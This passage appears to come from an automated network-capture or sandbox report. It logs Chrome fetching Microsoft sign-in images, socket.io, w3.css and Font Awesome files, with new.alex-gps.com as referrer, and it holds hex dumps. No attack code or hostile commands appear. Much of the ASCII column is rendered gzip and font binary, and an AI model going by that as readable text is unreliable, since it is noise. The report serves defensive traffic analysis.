                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Access-Control-Allow-Origin: *
                                                      x-azure-ref: 20241023T212937Z-r197bdfb6b46gt25anfa5gg2fw000000026g00000000pg5h
                                                      x-fd-int-roxy-purgeid: 0
                                                      X-Cache: TCP_MISS
                                                      Accept-Ranges: bytes
                                                      2024-10-23 21:29:38 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                      Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.164964118.245.187.884436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:37 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                      Host: cdn.socket.io
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:38 UTC701INHTTP/1.1 200 OK
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Content-Length: 49993
                                                      Connection: close
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: public, max-age=31536000, immutable
                                                      Content-Disposition: inline; filename="socket.io.min.js"
                                                      Date: Tue, 13 Aug 2024 19:51:35 GMT
                                                      ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: lhr1::2gch7-1723578695059-acdc718e5d01
                                                      X-Cache: Hit from cloudfront
                                                      Via: 1.1 006b25462db4c833e7b95f066ef77882.cloudfront.net (CloudFront)
                                                      X-Amz-Cf-Pop: LHR5-P3
                                                      X-Amz-Cf-Id: q1N0Oe4U3tPjjDjxNi0VOmcF0Aj3YjNA2B8sX-6aPEc61ZmNU6tpBA==
                                                      Age: 7360383
                                                      2024-10-23 21:29:38 UTC15683INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                      Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                      2024-10-23 21:29:38 UTC16384INData Raw: 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e 63
                                                      Data Ascii: this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:func
                                                      2024-10-23 21:29:38 UTC16384INData Raw: 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69 73
                                                      Data Ascii: .data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,this
                                                      2024-10-23 21:29:38 UTC1542INData Raw: 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e 75
                                                      Data Ascii: tTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.u


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.1649642192.229.133.2214436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:37 UTC545OUTGET /w3css/4/w3.css HTTP/1.1
                                                      Host: www.w3schools.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://new.alex-gps.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:38 UTC581INHTTP/1.1 200 OK
                                                      Age: 131860
                                                      Cache-Control: public,max-age=31536000,public
                                                      Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                      Content-Type: text/css
                                                      Date: Wed, 23 Oct 2024 21:29:38 GMT
                                                      Etag: "0a29a965824db1:0+gzip+ident"
                                                      Last-Modified: Tue, 22 Oct 2024 08:01:24 GMT
                                                      Server: ECS (lhd/35B3)
                                                      Vary: Accept-Encoding
                                                      X-Cache: HIT
                                                      X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                      X-Powered-By: ASP.NET
                                                      Content-Length: 23427
                                                      Connection: close
                                                      2024-10-23 21:29:38 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                      Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                      2024-10-23 21:29:38 UTC1INData Raw: 21
                                                      Data Ascii: !
                                                      2024-10-23 21:29:38 UTC7043INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34
                                                      Data Ascii: important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#4


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.164964813.107.246.674436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:38 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                      Host: aadcdn.msauth.net
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:38 UTC779INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:38 GMT
                                                      Content-Type: image/svg+xml
                                                      Content-Length: 1435
                                                      Connection: close
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Encoding: gzip
                                                      Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                      ETag: 0x8DB5C3F4911527F
                                                      x-ms-request-id: 42585084-601e-001f-6c1c-257052000000
                                                      x-ms-version: 2009-09-19
                                                      x-ms-lease-status: unlocked
                                                      x-ms-blob-type: BlockBlob
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Access-Control-Allow-Origin: *
                                                      x-azure-ref: 20241023T212938Z-r197bdfb6b4sn8wg20e97vn7ps0000000nbg000000005df8
                                                      x-fd-int-roxy-purgeid: 0
                                                      X-Cache: TCP_HIT
                                                      Accept-Ranges: bytes
                                                      2024-10-23 21:29:38 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                      Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.164964913.107.246.454436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:38 UTC674OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                      Host: aadcdn.msauth.net
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://new.alex-gps.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:38 UTC779INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:38 GMT
                                                      Content-Type: image/svg+xml
                                                      Content-Length: 2407
                                                      Connection: close
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Encoding: gzip
                                                      Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                      ETag: 0x8DB5C3F499A9B99
                                                      x-ms-request-id: 7234e296-301e-005f-611c-25776a000000
                                                      x-ms-version: 2009-09-19
                                                      x-ms-lease-status: unlocked
                                                      x-ms-blob-type: BlockBlob
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Access-Control-Allow-Origin: *
                                                      x-azure-ref: 20241023T212938Z-r197bdfb6b49q495mwyebb3r6s00000009t000000000bf19
                                                      x-fd-int-roxy-purgeid: 0
                                                      X-Cache: TCP_HIT
                                                      Accept-Ranges: bytes
                                                      2024-10-23 21:29:38 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                      Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.164965113.107.246.454436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:38 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                      Host: logincdn.msauth.net
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:39 UTC799INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:39 GMT
                                                      Content-Type: image/svg+xml
                                                      Content-Length: 276
                                                      Connection: close
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Encoding: gzip
                                                      Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                      ETag: 0x8D79ED35591CF44
                                                      x-ms-request-id: 950426cf-501e-0066-6877-258c76000000
                                                      x-ms-version: 2009-09-19
                                                      x-ms-lease-status: unlocked
                                                      x-ms-blob-type: BlockBlob
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Access-Control-Allow-Origin: *
                                                      x-azure-ref: 20241023T212939Z-15b8d89586fdmfsg1u7xrpfws000000002bg00000000a1tg
                                                      x-fd-int-roxy-purgeid: 0
                                                      X-Cache: TCP_HIT
                                                      X-Cache-Info: L1_T2
                                                      Accept-Ranges: bytes
                                                      2024-10-23 21:29:39 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                      Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.1649656104.17.25.144436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:39 UTC653OUTGET /ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                      Host: cdnjs.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://new.alex-gps.com
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: font
                                                      Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:39 UTC974INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:39 GMT
                                                      Content-Type: application/octet-stream; charset=utf-8
                                                      Content-Length: 154228
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: public, max-age=30672000
                                                      ETag: "623a082a-25a74"
                                                      Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                      cf-cdnjs-via: cfworker/kv
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Timing-Allow-Origin: *
                                                      X-Content-Type-Options: nosniff
                                                      CF-Cache-Status: HIT
                                                      Age: 15032
                                                      Expires: Mon, 13 Oct 2025 21:29:39 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xNLKO1ZAc6sbRkZRGu2rjitrSskNzvvqSzCGBHF6r2K25xPwC6%2FDUFxDfX%2FKsLAWINLcSxcI2pdUgeXvIIutB7A3G1ZUOiSVhtOn6zypIrPr6sATCkKnvqsDixVVBr5oMyPCxPuj"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=15780000
                                                      Server: cloudflare
                                                      CF-RAY: 8d74d2e39fc28787-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-10-23 21:29:39 UTC395INData Raw: 77 4f 46 32 00 01 00 00 00 02 5a 74 00 0a 00 00 00 05 a0 28 00 02 5a 29 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 ab 28 00 81 8f 40 ca 94 d0 28 cb ab 2c 05 87 70 07 20 a5 13 d0 92 94 01 48 70 1e 00 00 b6 ea e7 61 44 8a 66 0f 4f 11 b0 71 00 00 e8 9a 07 40 55 55 55 55 d5 a4 84 80 c7 6c db 01 a8 aa aa e0 47 3f f9 d9 2f 7e f5 9b df fd e1 4f 7f f9 9b bf fb 87 7f fa 97 7f fb 8f ff fa 9f ff fb 4f 81 c1 b8 fb 07 c2 b4 6c c7 e5 f6 78 7d 7e c3 7f b5 df e7 b9 3d ef 03 ed 4e 88 27 c0 8e b8 a3 c2 0a 88 ca 47 75 40 af 8c 70 31 86 47 a8 08 19 e3 d6 66 2c cc a5 2a 10 cb 56 3c 5b 00 c4 57 08 e1 55 a6 57 23 f9 e4 02 90 13 e0 40 9e 82 ab ed f0 22 5b c9 44 f4 38 98 89 ca 8b 0b 4c b4 ed 37 49 a7 07 f5 bc 7f e0 4f a4 7b
                                                      Data Ascii: wOF2Zt(Z)8$ `(@(,p HpaDfOq@UUUUlG?/~OOlx}~=N'Gu@p1Gf,*V<[WUW#@"[D8L7IO{
